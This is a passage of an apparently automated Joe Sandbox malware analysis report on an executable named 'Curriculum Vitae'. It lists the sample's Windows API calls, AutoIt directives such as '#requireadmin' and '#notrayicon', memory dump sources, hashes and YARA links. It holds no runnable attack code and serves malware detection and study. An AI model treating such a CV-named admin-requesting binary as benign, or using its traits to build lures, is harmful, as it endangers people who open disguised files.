                      • Opcode ID: a810816ef223f9d240866ec20bd3c17b94b7d7ab66fb2056fe26e7a2ae37cc76
                      • Instruction ID: 4a15508833d44d884cd2ab3532b033142bc4ea39157b532d04d280a065564f93
                      • Opcode Fuzzy Hash: a810816ef223f9d240866ec20bd3c17b94b7d7ab66fb2056fe26e7a2ae37cc76
                      • Instruction Fuzzy Hash: 9D316179A00258FFDB21DB999885D9EBBFCEB85310B1841A6F804E7211D6708E44DBB0
                      Function 00D9C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D9C306
                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00D9C34C
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E01990,016E75E0), ref: 00D9C395
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem
                      • String ID: 0
                      • API String ID: 135850232-4108050209
                      • Opcode ID: 5a75aaa133dbd0f7b0e4bf6f9a1e8c69af3ed299a307e04f1cea98dc2df2b629
                      • Instruction ID: efc24f517770b35f780d27b88303dd4db5d61610d611294f461bce213aba250d
                      • Opcode Fuzzy Hash: 5a75aaa133dbd0f7b0e4bf6f9a1e8c69af3ed299a307e04f1cea98dc2df2b629
                      • Instruction Fuzzy Hash: D9419F712143029FDB20DF29D885B5ABBE4EF85320F149A1DF9A5972D1D770E904CB72
                      Function 00DC4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                      Download Yara Rule
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DCCC08,00000000,?,?,?,?), ref: 00DC44AA
                      • GetWindowLongW.USER32 ref: 00DC44C7
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC44D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: ca45a54944a135c412eca7a7132e397414f82df214ddf06ddfb03798113cc8ea
                      • Instruction ID: 35006ebafdaf0be9b7f56db10021dafb03c43f5d1fe3e554f17721b7a133f113
                      • Opcode Fuzzy Hash: ca45a54944a135c412eca7a7132e397414f82df214ddf06ddfb03798113cc8ea
                      • Instruction Fuzzy Hash: 36316A31214606AFDB258E78DC55FEA7BA9EB08324F244719F979932E0D770A8509770
                      Function 00DB304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00DB335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DB3077,?,?), ref: 00DB3378
                      • inet_addr.WSOCK32(?), ref: 00DB307A
                      • _wcslen.LIBCMT ref: 00DB309B
                      • htons.WSOCK32(00000000), ref: 00DB3106
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                      • String ID: 255.255.255.255
                      • API String ID: 946324512-2422070025
                      • Opcode ID: e004da45cee0693e5e5c7526c59451c82124fcb39ee1fbb503b149461eabe9e5
                      • Instruction ID: 5a3d7263c6422883a079aeca891a8e6aca6d19f499905287c88ada925b98023e
                      • Opcode Fuzzy Hash: e004da45cee0693e5e5c7526c59451c82124fcb39ee1fbb503b149461eabe9e5
                      • Instruction Fuzzy Hash: 7A31AF39604205DFCB10DF28C885EAA77E4EF54358F688059E9168B392DB72EE45DB70
                      Function 00DC4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DC4705
                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DC4713
                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DC471A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$DestroyWindow
                      • String ID: msctls_updown32
                      • API String ID: 4014797782-2298589950
                      • Opcode ID: 8dbb128f541bba4dce1a01f08f5e86e86df7ef3fb0addb8609ad900a488f4cce
                      • Instruction ID: b11ce1c3b50357b57bf373ae71e672a72c33aaecebda0f504410aad1d5fc6477
                      • Opcode Fuzzy Hash: 8dbb128f541bba4dce1a01f08f5e86e86df7ef3fb0addb8609ad900a488f4cce
                      • Instruction Fuzzy Hash: 702131B560020AAFDB11DF64DC91EB737ADEF5A364B040059FA049B391D771EC51CA70
                      Function 00D995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 176396367-2734436370
                      • Opcode ID: 0813cb935c3c51a9357149be19a9e76869c3aae149a7fb705c0351f55264fc85
                      • Instruction ID: f94275f82a941ab2cfe7ce3e2cd7d43fec8de15be8bb1305c5617b85dc8964c1
                      • Opcode Fuzzy Hash: 0813cb935c3c51a9357149be19a9e76869c3aae149a7fb705c0351f55264fc85
                      • Instruction Fuzzy Hash: 1C21087220455166DB31AB2C9C22FB7F3A9DF51311F18402EFD4997141EB51ED45C2F6
                      Function 00DC37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DC3840
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DC3850
                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DC3876
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 3c0468bfc78c0f22c4e004954022252ba9294749a9e4c1b1abb523d7d0016102
                      • Instruction ID: c5d670336002b6d53002eec094216a9fe2b6472de9f5a0019f33d24053067d1b
                      • Opcode Fuzzy Hash: 3c0468bfc78c0f22c4e004954022252ba9294749a9e4c1b1abb523d7d0016102
                      • Instruction Fuzzy Hash: 49217C7261021ABBEB219F54DC85FAB376AEF89750F158128FA049B190C672DC528BB0
                      Function 00DA49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA4A08
                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DA4A5C
                      • SetErrorMode.KERNEL32(00000000,?,?,00DCCC08), ref: 00DA4AD0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume
                      • String ID: %lu
                      • API String ID: 2507767853-685833217
                      • Opcode ID: 1bd4b3c6005ecee2cc9917f0dfff3fad295b625071a15f77ae3244e1c0aa45a5
                      • Instruction ID: 60152ec0d4d2dfe7d955ed7fd44cc2d2a848c7262150e2f86a61db4764a1d126
                      • Opcode Fuzzy Hash: 1bd4b3c6005ecee2cc9917f0dfff3fad295b625071a15f77ae3244e1c0aa45a5
                      • Instruction Fuzzy Hash: 67310C75A00209AFDB10DF54C985EAABBF8EF49308F1880A9E909DB252D771ED45CB71
                      Function 00DC41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DC424F
                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DC4264
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DC4271
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: bb1cbe1a0a634907b9aaf6f39c525319738145639874cb022c1ed9ed7c134ccf
                      • Instruction ID: 69f419456e3deb73a03af22b38af3d4d73e9e9e46dd32e3709bca1c5d2cab944
                      • Opcode Fuzzy Hash: bb1cbe1a0a634907b9aaf6f39c525319738145639874cb022c1ed9ed7c134ccf
                      • Instruction Fuzzy Hash: 7D110631240209BEEF205F29CC06FAB7BACEF85B54F014118FA55E70A0D271DC519B34
                      Function 00D92F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                        • Part of subcall function 00D92DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D92DC5
                        • Part of subcall function 00D92DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D92DD6
                        • Part of subcall function 00D92DA7: GetCurrentThreadId.KERNEL32 ref: 00D92DDD
                        • Part of subcall function 00D92DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D92DE4
                      • GetFocus.USER32 ref: 00D92F78
                        • Part of subcall function 00D92DEE: GetParent.USER32(00000000), ref: 00D92DF9
                      • GetClassNameW.USER32(?,?,00000100), ref: 00D92FC3
                      • EnumChildWindows.USER32(?,00D9303B), ref: 00D92FEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                      • String ID: %s%d
                      • API String ID: 1272988791-1110647743
                      • Opcode ID: 1e6ae46e6729868b3e84bb3152860c050968d15b37d3da67d0d98c7e09fd48d8
                      • Instruction ID: 2d8ab1d81d7e4a8210bc4608f16e7b58ed70aff8f360af340b4297fe4566159f
                      • Opcode Fuzzy Hash: 1e6ae46e6729868b3e84bb3152860c050968d15b37d3da67d0d98c7e09fd48d8
                      • Instruction Fuzzy Hash: DA1181716002066BCF147F749C89EFE776AEF94304F049075FA0D9B292DE7099498B70
                      Function 00DC5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DC58C1
                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DC58EE
                      • DrawMenuBar.USER32(?), ref: 00DC58FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$InfoItem$Draw
                      • String ID: 0
                      • API String ID: 3227129158-4108050209
                      • Opcode ID: a7a2fb5ee1675391cca0608d98d21431dc40982dbffdd202e5b95e95b647833e
                      • Instruction ID: 4c62a02ec9077974759f0fa3360c8fa783e6f1bdae04a43224307fba41c958e5
                      • Opcode Fuzzy Hash: a7a2fb5ee1675391cca0608d98d21431dc40982dbffdd202e5b95e95b647833e
                      • Instruction Fuzzy Hash: 04015B3151021AEFDB219F11EC44FAEBBB8FB45361F1480A9F949D6261DB309A85DF31
                      Function 00D9007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 061bad8f35c7b1f2d8e0a19acfdd98253492505a7c57795b6de17c7f2bdf49a8
                      • Instruction ID: 34075b9fb1db26d24bd277a555d7fc3d827329f5db789dfedb7c176a3c54a3c6
                      • Opcode Fuzzy Hash: 061bad8f35c7b1f2d8e0a19acfdd98253492505a7c57795b6de17c7f2bdf49a8
                      • Instruction Fuzzy Hash: B0C17C75A00216EFCB14DFA8D894EAEBBB5FF48704F248598E905EB251D731ED41CBA0
                      Function 00DB342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearInitInitializeUninitialize
                      • String ID:
                      • API String ID: 1998397398-0
                      • Opcode ID: db775bdc528925eef7d435f13060e5f608220b97e21f48e8946bf6d7cfd0d3f1
                      • Instruction ID: ad279e355e404b381693adaf4e3beebde8ef7c3495218dc506c0ebc925e88b45
                      • Opcode Fuzzy Hash: db775bdc528925eef7d435f13060e5f608220b97e21f48e8946bf6d7cfd0d3f1
                      • Instruction Fuzzy Hash: AEA11575604601DFCB14DF29C485A6AB7E5FF88714F048859F98A9B362DB30EE01DBB1
                      Function 00D90436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                      Download Yara Rule
                      APIs
                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DCFC08,?), ref: 00D905F0
                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DCFC08,?), ref: 00D90608
                      • CLSIDFromProgID.OLE32(?,?,00000000,00DCCC40,000000FF,?,00000000,00000800,00000000,?,00DCFC08,?), ref: 00D9062D
                      • _memcmp.LIBVCRUNTIME ref: 00D9064E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FromProg$FreeTask_memcmp
                      • String ID:
                      • API String ID: 314563124-0
                      • Opcode ID: 213f76d7e962ac2c161264cc6145b893999dbb1a4995cfc63c2c5b42d23e91ba
                      • Instruction ID: 032f29d55b103af352b2d66c26ab3c95ce13c91b88804c4649dbf0d08d9ad0c5
                      • Opcode Fuzzy Hash: 213f76d7e962ac2c161264cc6145b893999dbb1a4995cfc63c2c5b42d23e91ba
                      • Instruction Fuzzy Hash: F281E875A00209EFCF04DF94C984EEEBBB9FF89315F244558E516AB250DB71AE06CB60
                      Function 00D71391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 349525abb8ab55e7304e16a0ceec4928c235da1ddbd68d707940d9f92725630b
                      • Instruction ID: 62c08f4c0648c2fa88c1e4e12a43e97a13903799374c814ac43495cf836eab94
                      • Opcode Fuzzy Hash: 349525abb8ab55e7304e16a0ceec4928c235da1ddbd68d707940d9f92725630b
                      • Instruction Fuzzy Hash: 96416C79A00210ABDF256BFC9C46ABE3AA5EF41374F28C325FC1DD7291F63488415271
                      Function 00DC6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(016F0828,?), ref: 00DC62E2
                      • ScreenToClient.USER32(?,?), ref: 00DC6315
                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DC6382
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: 648d3d4331863cfdeb37da7b80e17bdb563dcbb7e6afb538cd9dcbc4ce350d30
                      • Instruction ID: 6cc86ea56d0680463f1dea4b6bb00ef956058b8f4936eabd79e25c2ed7ee28bc
                      • Opcode Fuzzy Hash: 648d3d4331863cfdeb37da7b80e17bdb563dcbb7e6afb538cd9dcbc4ce350d30
                      • Instruction Fuzzy Hash: B2512C74A0024AEFCB10DF68D980EAE7BB5EF85360F18815DF9159B2A0D731ED81CB60
                      Function 00DB1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                      Download Yara Rule
                      APIs
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00DB1AFD
                      • WSAGetLastError.WSOCK32 ref: 00DB1B0B
                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DB1B8A
                      • WSAGetLastError.WSOCK32 ref: 00DB1B94
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$socket
                      • String ID:
                      • API String ID: 1881357543-0
                      • Opcode ID: d6fcd2235bfb244aebe3dc77ca0f055cd85bc77789723d49f38fec4987e6b106
                      • Instruction ID: e9fa76907b6e56d723d67749de2d058f8855024d0d57f2a495b3c1207156597a
                      • Opcode Fuzzy Hash: d6fcd2235bfb244aebe3dc77ca0f055cd85bc77789723d49f38fec4987e6b106
                      • Instruction Fuzzy Hash: BB41A078600200AFE720AF24C886F667BE5EB45718F588448FA1A9F3D2D672DD41CBB0
                      Function 00D6B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
